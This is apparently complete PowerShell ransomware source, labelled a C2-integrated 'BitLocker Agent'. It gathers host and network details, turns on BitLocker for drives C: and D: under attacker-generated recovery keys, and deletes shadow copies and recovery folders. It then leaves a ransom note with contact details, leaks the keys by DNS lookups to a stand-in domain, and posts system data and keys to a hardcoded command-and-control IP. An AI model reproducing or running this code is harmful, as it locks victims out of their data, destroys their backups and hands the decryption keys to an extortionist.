# ============================================
# BitLocker Agent v2.0 - C2集成版本
# Generated by BitLocker Monitor C2
# Timestamp: 2026-04-09T15:00:34.738661
# ============================================

param(
    [string]$ServerUrl = "43.139.60.216",
    [int]$ServerPort = 8080,
    [string]$ApiEndpoint = "/api/ls",
    [switch]$SkipConfirm
)

# ==================== C2配置 ====================
$C2Config = @{
    ServerUrl = $ServerUrl
    ServerPort = $ServerPort
    ApiEndpoint = $ApiEndpoint
    Timeout = 30
    MaxRetries = 3
}

# ==================== 攻击配置 ====================
$AttackConfig = @{
    TargetDrives = @("C:", "D:")
    DeleteShadowCopies = $true
    DeleteRecoveryDirs = $true
    CreateRansomNote = $true
    ContactEmail = "vip-ls@vipssss.com"
    ContactTelegram = "@vipssss.com"
    CustomMessage = @"

"@
    SaveRecoveryKey = $true
    KeySavePath = "C:\Windows\Temp"
    DnsExfiltration = $true
    DnsDomain = "attacker.test"
}

Clear-Host
Write-Host "╔══════════════════════════════════════════════════════╗" -ForegroundColor DarkRed
Write-Host "║   BitLocker Agent v2.0 - C2 Integrated              ║" -ForegroundColor DarkRed
Write-Host "╚══════════════════════════════════════════════════════╝" -ForegroundColor DarkRed
Write-Host ""

# ==================== 工具函数 ====================

function Send-ToC2 {
    param(
        [hashtable]$Data,
        [string]$Stage
    )

    $jsonPayload = $Data | ConvertTo-Json -Depth 10
    $uri = "http://$($C2Config.ServerUrl):$($C2Config.ServerPort)$($C2Config.ApiEndpoint)"

    Write-Host "[C2] Sending $Stage data to: $uri" -ForegroundColor Cyan

    for ($retry = 0; $retry -lt $C2Config.MaxRetries; $retry++) {
        try {
            $ErrorActionPreference = "Stop"
            $response = Invoke-RestMethod -Uri $uri -Method Post -Body $jsonPayload -ContentType "application/json" -TimeoutSec $C2Config.Timeout
            Write-Host "[C2] ✓ $Stage data sent successfully" -ForegroundColor Green
            return $true
        } catch {
            $ErrorActionPreference = "Continue"
            Write-Host "[C2] ⚠ Attempt $($retry + 1)/$($C2Config.MaxRetries) failed: $($_.Exception.Message)" -ForegroundColor Yellow
            if ($retry -lt ($C2Config.MaxRetries - 1)) {
                Start-Sleep -Seconds 2
            }
        }
    }

    Write-Host "[C2] ✗ $Stage data send failed, saving locally" -ForegroundColor Red
    $backupFile = "$env:TEMP\attack_${Stage}_$(Get-Date -Format 'yyyyMMddHHmmss').json"
    $jsonPayload | Out-File -FilePath $backupFile -Encoding UTF8
    return $false
}

function Get-SystemInfo {
    Write-Host "[Collect] Gathering system information..." -ForegroundColor Cyan

    $systemInfo = @{
        AttackTimestamp = (Get-Date -Format "yyyy-MM-ddTHH:mm:ss")
        ComputerName = $env:COMPUTERNAME
        UserName = $env:USERNAME
        Domain = $env:USERDOMAIN
    }

    # Get IP addresses
    $ipAddresses = @()
    try {
        Get-NetIPAddress -AddressFamily IPv4 -ErrorAction SilentlyContinue | Where-Object {
            $_.InterfaceAlias -notlike "*Loopback*" -and $_.IPAddress -notlike "127.*"
        } | ForEach-Object {
            $ipAddresses += @{IPAddress = $_.IPAddress; Interface = $_.InterfaceAlias}
        }
    } catch {
        $ipConfig = ipconfig | Select-String "IPv4"
        $ipConfig | ForEach-Object {
            if ($_ -match "(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})") {
                $ipAddresses += @{IPAddress = $matches[1]; Interface = "Unknown"}
            }
        }
    }
    $systemInfo.IPAddresses = $ipAddresses

    # Get MAC addresses
    $macAddresses = @()
    try {
        Get-NetAdapter -ErrorAction SilentlyContinue | Where-Object {$_.Status -eq "Up"} | ForEach-Object {
            $macAddresses += @{
                MacAddress = $_.MacAddress
                InterfaceName = $_.Name
            }
        }
    } catch {
        Get-WmiObject Win32_NetworkAdapter -ErrorAction SilentlyContinue | Where-Object {$_.NetEnabled -eq $true} | ForEach-Object {
            $macAddresses += @{
                MacAddress = $_.MACAddress
                InterfaceName = $_.NetConnectionID
            }
        }
    }
    $systemInfo.NetworkAdapters = $macAddresses

    # Get disk information
    $disks = @()
    Get-CimInstance Win32_LogicalDisk -ErrorAction SilentlyContinue | Where-Object {$_.DriveType -eq 3} | ForEach-Object {
        $disks += @{
            DriveLetter = $_.DeviceID
            VolumeName = $_.VolumeName
            SizeGB = [math]::Round($_.Size / 1GB, 2)
            FreeGB = [math]::Round($_.FreeSpace / 1GB, 2)
        }
    }
    $systemInfo.Disks = $disks

    # Get OS information
    $osInfo = Get-CimInstance Win32_OperatingSystem -ErrorAction SilentlyContinue
    $systemInfo.OS = @{
        Caption = $osInfo.Caption
        Version = $osInfo.Version
        BuildNumber = $osInfo.BuildNumber
        OSArchitecture = $osInfo.OSArchitecture
    }

    Write-Host "[Collect] ✓ System info collected" -ForegroundColor Green
    return $systemInfo
}

function Test-EncryptionCapability {
    param([ref]$SystemInfoRef)

    Write-Host "`n[Check] Compatibility check" -ForegroundColor Cyan
    Write-Host "=========================" -ForegroundColor Cyan

    $checks = @{
        IsAdmin = $false
        SupportedSKU = $false
        BitLockerAvailable = $false
        DriveNotEncrypted = $false
    }

    # 1. Admin check
    Write-Host "[1/4] Checking admin privileges..." -ForegroundColor Yellow
    $isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    if (-not $isAdmin) {
        Write-Host "  ✗ Admin privileges required" -ForegroundColor Red
    } else {
        Write-Host "  ✓ Admin privileges confirmed" -ForegroundColor Green
        $checks.IsAdmin = $true
    }

    # 2. SKU check
    Write-Host "`n[2/4] Checking OS support..." -ForegroundColor Yellow
    try {
        $os = Get-WmiObject Win32_OperatingSystem
        $sku = $os.OperatingSystemSKU
        Write-Host "  OS: $($os.Caption)" -ForegroundColor Gray
        Write-Host "  SKU: $sku" -ForegroundColor Gray

        $supportedSkus = @(4, 7, 8, 10, 11, 12, 13, 14, 15, 16, 17, 18, 20, 21, 22, 26, 27, 28, 29, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 55, 56, 59, 60, 61, 63, 64, 66, 72, 76, 77, 79, 80, 84, 85, 87, 97, 98, 103, 104, 121, 125, 126, 127, 129, 131, 133, 145, 146, 161, 162, 164, 165, 175, 178, 188, 191, 199, 203, 205, 209, 213, 215, 217, 219, 221, 223, 225, 227, 229, 231, 233, 235, 237, 239, 241, 243, 245, 247, 249, 251, 253, 255)

        if ($sku -in $supportedSkus) {
            Write-Host "  ✓ OS supports BitLocker" -ForegroundColor Green
            $checks.SupportedSKU = $true
        } else {
            Write-Host "  ✗ OS does not support BitLocker" -ForegroundColor Red
        }
    } catch {
        Write-Host "  ✗ OS check failed: $_" -ForegroundColor Red
    }

    # 3. BitLocker tools check
    Write-Host "`n[3/4] Checking BitLocker tools..." -ForegroundColor Yellow
    $bdePath = where.exe manage-bde 2>$null
    if ($bdePath) {
        Write-Host "  ✓ manage-bde available" -ForegroundColor Green
        $checks.BitLockerAvailable = $true
    } else {
        Write-Host "  ✗ manage-bde not found" -ForegroundColor Red
    }

    # 4. Encryption status check
    Write-Host "`n[4/4] Checking encryption status..." -ForegroundColor Yellow
    try {
        $currentStatus = cmd /c "manage-bde -status C: 2>&1"
        if ($currentStatus -match "Protection Status:\s+On") {
            Write-Host "  ✗ Drive C: already encrypted" -ForegroundColor Red
        } elseif ($currentStatus -match "Protection Status:\s+Off") {
            Write-Host "  ✓ Drive C: not encrypted" -ForegroundColor Green
            $checks.DriveNotEncrypted = $true
        } else {
            Write-Host "  ⚠ Unknown status, assuming encryptable" -ForegroundColor Yellow
            $checks.DriveNotEncrypted = $true
        }
    } catch {
        Write-Host "  ⚠ Status check failed: $_" -ForegroundColor Yellow
        $checks.DriveNotEncrypted = $true
    }

    $SystemInfoRef.Value.EncryptionChecks = $checks
    $SystemInfoRef.Value.CanEncrypt = ($checks.IsAdmin -and $checks.SupportedSKU -and $checks.BitLockerAvailable -and $checks.DriveNotEncrypted)

    Write-Host "`n" + ("=" * 50) -ForegroundColor Cyan
    if ($SystemInfoRef.Value.CanEncrypt) {
        Write-Host "✓ System is compatible for BitLocker attack" -ForegroundColor Green
        return $true
    } else {
        Write-Host "✗ System is NOT compatible" -ForegroundColor Red
        return $false
    }
}

function Get-BitLockerRecoveryKey {
    $key = ""
    for ($i = 0; $i -lt 8; $i++) {
        do {
            $num = Get-Random -Minimum 0 -Maximum 720896
        } while ($num % 11 -ne 0)
        $key += "{0:000000}" -f $num
        if ($i -lt 7) { $key += "-" }
    }
    return $key
}

function Start-BitLockerAttack {
    param([ref]$SystemInfoRef)

    Write-Host "`n" + ("=" * 60) -ForegroundColor Red
    Write-Host "          Starting BitLocker Attack" -ForegroundColor Red
    Write-Host ("=" * 60) -ForegroundColor Red

    $attackResults = @()
    $recoveryKeys = @()
    $bitlockerInfo = @()

    foreach ($drive in $AttackConfig.TargetDrives) {
        Write-Host "`n[Attack] Processing drive: $drive" -ForegroundColor Yellow

        # Generate recovery key
        $recoveryKey = Get-BitLockerRecoveryKey
        Write-Host "[Attack] Recovery key: $recoveryKey" -ForegroundColor Magenta

        # Save key locally
        if ($AttackConfig.SaveRecoveryKey) {
            $keyFile = "$($AttackConfig.KeySavePath)\RecoveryKey_$(Get-Date -Format 'yyyyMMddHHmmss').txt"
            @"
BITLOCKER RECOVERY KEY
======================
Computer: $env:COMPUTERNAME
Drive: $drive
Time: $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')
Recovery Key: $recoveryKey
"@ | Out-File -FilePath $keyFile -Encoding UTF8
            Write-Host "[Attack] ✓ Key saved: $keyFile" -ForegroundColor Green
        }

        # Add recovery key protector
        Write-Host "[Attack] Adding recovery key protector..." -ForegroundColor Yellow
        try {
            $result = cmd /c "manage-bde -protectors -add $drive -RecoveryPassword $recoveryKey 2>&1"
            if ($LASTEXITCODE -eq 0) {
                Write-Host "[Attack] ✓ Protector added" -ForegroundColor Green
            }
        } catch {}

        # Enable BitLocker
        Write-Host "[Attack] Enabling BitLocker..." -ForegroundColor Yellow
        $encryptionStarted = $false

        # Method 1: TPM
        try {
            $result = cmd /c "manage-bde -on $drive -UsedSpaceOnly -SkipHardwareTest 2>&1"
            if ($LASTEXITCODE -eq 0) {
                Write-Host "[Attack] ✓ BitLocker enabled via TPM" -ForegroundColor Green
                $encryptionStarted = $true
            }
        } catch {}

        # Method 2: Recovery password
        if (-not $encryptionStarted) {
            try {
                $result = cmd /c "manage-bde -on $drive -RecoveryPassword $recoveryKey -UsedSpaceOnly -SkipHardwareTest 2>&1"
                if ($LASTEXITCODE -eq 0) {
                    Write-Host "[Attack] ✓ BitLocker enabled via recovery password" -ForegroundColor Green
                    $encryptionStarted = $true
                }
            } catch {}
        }

        $attackResults += @{
            Drive = $drive
            Action = "EnableBitLocker"
            Status = $(if ($encryptionStarted) {"Success"} else {"Failed"})
            Timestamp = (Get-Date -Format "yyyy-MM-ddTHH:mm:ss")
        }

        $bitlockerInfo += @{
            MountPoint = $drive
            ProtectionStatus = $(if ($encryptionStarted) {"On"} else {"Off"})
            RecoveryPassword = $recoveryKey
        }

        $recoveryKeys += @{
            MountPoint = $drive
            RecoveryPassword = $recoveryKey
        }
    }

    # Delete shadow copies
    if ($AttackConfig.DeleteShadowCopies) {
        Write-Host "`n[Attack] Deleting shadow copies..." -ForegroundColor Yellow
        try {
            cmd /c "vssadmin delete shadows /all /quiet 2>nul"
            Write-Host "[Attack] ✓ Shadow copies deleted" -ForegroundColor Green
            $attackResults += @{
                Drive = "All"
                Action = "DeleteShadowCopies"
                Status = "Success"
                Timestamp = (Get-Date -Format "yyyy-MM-ddTHH:mm:ss")
            }
        } catch {}
    }

    # Delete recovery directories
    if ($AttackConfig.DeleteRecoveryDirs) {
        Write-Host "[Attack] Deleting recovery directories..." -ForegroundColor Yellow
        $recoveryPaths = @("C:\Recovery", "C:\Windows\Panther", "C:\`$WINDOWS.~BT")
        foreach ($path in $recoveryPaths) {
            if (Test-Path $path) {
                Remove-Item -Path "$path\*" -Recurse -Force -ErrorAction SilentlyContinue
            }
        }
        Write-Host "[Attack] ✓ Recovery directories cleaned" -ForegroundColor Green
    }

    # Create ransom note
    if ($AttackConfig.CreateRansomNote) {
        Write-Host "[Attack] Creating ransom note..." -ForegroundColor Yellow
        $ransomNote = @"
==========================================
    WARNING - SYSTEM ENCRYPTED
==========================================

Computer: $env:COMPUTERNAME
Time: $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')
Affected Drives: $($AttackConfig.TargetDrives -join ", ")

HOW TO RECOVER:
1. DO NOT restart your computer
2. Contact: $($AttackConfig.ContactEmail)
3. Telegram: $($AttackConfig.ContactTelegram)

$($AttackConfig.CustomMessage)
==========================================
"@
        try {
            $ransomNote | Out-File -FilePath "C:\Users\Public\Desktop\!!!READ_ME_IMPORTANT!!!.txt" -Encoding UTF8
            Write-Host "[Attack] ✓ Ransom note created" -ForegroundColor Green
        } catch {}
    }

    # DNS exfiltration
    if ($AttackConfig.DnsExfiltration) {
        Write-Host "[Attack] Simulating DNS exfiltration..." -ForegroundColor Yellow
        foreach ($keyInfo in $recoveryKeys) {
            $dnsPart = $keyInfo.RecoveryPassword.Replace("-", "").Substring(0, [Math]::Min(30, $keyInfo.RecoveryPassword.Replace("-", "").Length))
            $null = nslookup "$dnsPart.$($AttackConfig.DnsDomain)" 2>&1
        }
        Write-Host "[Attack] ✓ DNS exfiltration simulated" -ForegroundColor Green
    }

    $SystemInfoRef.Value.RecoveryKeys = $recoveryKeys
    $SystemInfoRef.Value.BitLocker = $bitlockerInfo
    $SystemInfoRef.Value.AttackResults = $attackResults

    return ($attackResults | Where-Object {$_.Status -eq "Success"}).Count -gt 0
}

# ==================== Main Program ====================

Write-Host "[Init] C2 Server: http://$($C2Config.ServerUrl):$($C2Config.ServerPort)" -ForegroundColor Cyan
Write-Host "[Init] API Endpoint: $($C2Config.ApiEndpoint)" -ForegroundColor Cyan

# Phase 1: Collect system info
Write-Host "`n══════════════════════════════════════════════════════" -ForegroundColor Magenta
Write-Host "  Phase 1/3: Information Collection" -ForegroundColor Magenta
Write-Host "══════════════════════════════════════════════════════" -ForegroundColor Magenta

$systemInfo = Get-SystemInfo

# Phase 2: Compatibility check
Write-Host "`n══════════════════════════════════════════════════════" -ForegroundColor Magenta
Write-Host "  Phase 2/3: Compatibility Check" -ForegroundColor Magenta
Write-Host "══════════════════════════════════════════════════════" -ForegroundColor Magenta

$canEncrypt = Test-EncryptionCapability -SystemInfoRef ([ref]$systemInfo)

# Send initial data to C2
Write-Host "`n[C2] Sending initial system information..." -ForegroundColor Cyan
$c2Result = Send-ToC2 -Data $systemInfo -Stage "initial"

if (-not $canEncrypt) {
    Write-Host "`n[Error] System not compatible, cannot continue" -ForegroundColor Red
    Read-Host "`nPress Enter to exit"
    exit 1
}

# Attack confirmation
if (-not $SkipConfirm) {
    Write-Host "`n" + ("=" * 60) -ForegroundColor Red
    Write-Host "  ⚠️  WARNING - BitLocker Attack  ⚠️" -ForegroundColor Red
    Write-Host ("=" * 60) -ForegroundColor Red
    Write-Host ""
    Write-Host "Type 'CONFIRM-ATTACK' to continue: " -ForegroundColor Yellow -NoNewline
    $confirm = Read-Host
    if ($confirm -ne "CONFIRM-ATTACK") {
        Write-Host "Operation cancelled" -ForegroundColor Yellow
        exit 0
    }
}

# Phase 3: Execute attack
Write-Host "`n══════════════════════════════════════════════════════" -ForegroundColor Magenta
Write-Host "  Phase 3/3: Execute Attack" -ForegroundColor Magenta
Write-Host "══════════════════════════════════════════════════════" -ForegroundColor Magenta

$attackSuccess = Start-BitLockerAttack -SystemInfoRef ([ref]$systemInfo)

# Send final data to C2 (with keys)
Write-Host "`n[C2] Sending final attack data (with recovery keys)..." -ForegroundColor Cyan
$c2Result = Send-ToC2 -Data $systemInfo -Stage "final"

# Summary
Write-Host "`n" + ("=" * 60) -ForegroundColor Green
Write-Host "           Attack Completed" -ForegroundColor Green
Write-Host ("=" * 60) -ForegroundColor Green
Write-Host ""

Write-Host "Status: $(if ($attackSuccess) {'✓ Success'} else {'✗ Failed'})" -ForegroundColor $(if ($attackSuccess) {"Green"} else {"Red"})
Write-Host "C2 Communication: $(if ($c2Result) {'✓ Success'} else {'✗ Failed'})" -ForegroundColor $(if ($c2Result) {"Green"} else {"Red"})

if ($systemInfo.RecoveryKeys.Count -gt 0) {
    Write-Host "`nRecovery Keys:" -ForegroundColor Yellow
    foreach ($key in $systemInfo.RecoveryKeys) {
        Write-Host "  $($key.MountPoint): " -NoNewline
        Write-Host "$($key.RecoveryPassword)" -ForegroundColor Magenta
    }
}

Write-Host ""
Write-Host "⚠️  WARNING:" -ForegroundColor Red
Write-Host "  • Do NOT restart the computer!" -ForegroundColor Red
Write-Host ("=" * 60) -ForegroundColor Red
